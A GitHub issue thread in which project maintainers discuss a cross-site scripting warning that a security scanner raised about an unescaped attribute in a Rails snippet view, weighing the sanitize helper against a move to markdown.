Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Cross-Site Scripting Warning in app/views/snippets/show.html.erb #654

Open
ari opened this issue Aug 31, 2016 · 2 comments
Open

Cross-Site Scripting Warning in app/views/snippets/show.html.erb #654

ari opened this issue Aug 31, 2016 · 2 comments
Assignees
@k41n
Milestone
5.0

Comments

@ari
Copy link
Owner

ari commented Aug 31, 2016

Security issue from Hakiri: Unescaped model attribute in app/views/snippets/show.html.erb
@ari ari added this to the 5.0 milestone Aug 31, 2016
@ari ari assigned k41n Aug 31, 2016
@k41n
Copy link
Collaborator

k41n commented Aug 31, 2016

We can use http://apidock.com/rails/ActionView/Helpers/SanitizeHelper/sanitize to aviod this issue. But it can hide some parts of bodies for existing snippets, for example <client_name> or [some URL] on snippet view page. We can customize it, but need to define white list for tags. @ari

@ari
Copy link
Owner Author

ari commented Aug 31, 2016

Isn't this the same problem we have in task comments? Why aren't we getting an error there?

At any rate, I'd like to move to markdown for comment text (with some extensions of our own like #1234 task links). I guess we'll need to think about incoming text from emails too, but hopefully markdown will cope with that.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@k41n k41n

Labels
None yet
Projects
None yet
Milestone
5.0
Development

No branches or pull requests
2 participants
@ari @k41n